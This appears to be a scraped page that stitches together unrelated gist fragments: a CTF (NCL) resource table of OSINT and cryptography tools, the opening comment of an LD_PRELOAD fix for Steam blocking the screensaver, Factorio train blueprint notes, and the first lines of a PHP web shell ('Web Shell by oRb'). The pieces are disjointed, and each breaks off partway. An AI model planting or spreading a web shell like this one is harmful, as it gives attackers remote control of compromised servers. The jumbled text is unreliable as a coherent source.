| Problem Area | Resource/Tool | Notes |
|---|---|---|
| OSINT | Hack Control | Has links to a scary amount of information gathering tools. |
| OSINT | NCL Twitter/Cyber Kat's Website and Cyber Kat's Twitter | In the past hints and even required parts of challenges have been found here |
| OSINT | Sherlock | Useful for finding online/social accounts |
| OSINT | QRazyBox | Good QR code reconstruction tool |
| Cryptography | CyberChef | Good general purpose cyber tool |
| Cryptography | Cryptii | Site with various cipher operations |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* SPDX-License-Identifier: MIT */ | |
| /* | |
| * On Linux, Steam periodically calls SDL_DisableScreenSaver() so your | |
| * screensaver doesn't work with the Steam client open even if you aren't | |
| * playing a game, as described in | |
| * https://github.com/ValveSoftware/steam-for-linux/issues/5607 . | |
| * | |
| * To fix this, LD_PRELOAD a library that replaces SDL_DisableScreenSaver() | |
| * with a no-op if the executable calling it is Steam, but otherwise let it |
Unless otherwise specified, all designs are meant for 4-8 trains of the format L-4C-2L-4C-L. Most are also compatible with L-4C-L trains.
"Rail units" refer to the size of MRS blueprints.
5.2 x 3.5 rail units
Recommended logistics bots: 2000
Configured for iron smelting by default; change all requesters and two arithmetic combinators to use for another resource.
This is just a collection of useful Factorio blueprint books I have either found online or made myself. (Links are included where applicable.) I recommend using this Chrome extension to quickly copy these into Factorio.
All blueprints use blue belts unless stated otherwise.
See also:
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php # Web Shell by oRb | |
| //$auth_pass = "63a9f0ea7bb98050796b649e85481845"; | |
| $color = "#df5"; | |
| $default_action = 'FilesMan'; | |
| $default_use_ajax = true; |